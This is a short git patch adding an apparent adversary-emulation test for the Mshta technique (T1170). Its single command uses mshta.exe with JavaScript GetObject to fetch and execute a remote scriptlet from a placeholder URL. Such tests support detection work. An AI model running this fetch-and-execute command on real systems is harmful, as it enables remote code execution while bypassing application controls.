From 280b356f5766d2d6ff91a28bded1500dc0ec888e Mon Sep 17 00:00:00 2001
From: Brian Beyer <brian@redcanary.com>
Date: Sat, 12 May 2018 23:28:38 +0200
Subject: [PATCH] add ${T}

---
 atomics/t1170/t1170.yaml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 atomics/t1170/t1170.yaml

diff --git a/atomics/t1170/t1170.yaml b/atomics/t1170/t1170.yaml
new file mode 100644
index 00000000..8cc1478f
--- /dev/null
+++ b/atomics/t1170/t1170.yaml
@@ -0,0 +1,18 @@
+attack_technique: T1170
+display_name: Mshta
+
+atomic_tests:
+- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
+  description: |
+    Test execution of a remote script using mshta.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_url:
+      description: location of the payload
+      type: Url
+      default: https://www.example.com/mshta.sct
+  executor:
+    name: command_prompt
+    command: |
+      mshta.exe javascript:a=GetObject("script:#{file_url}").Exec();close();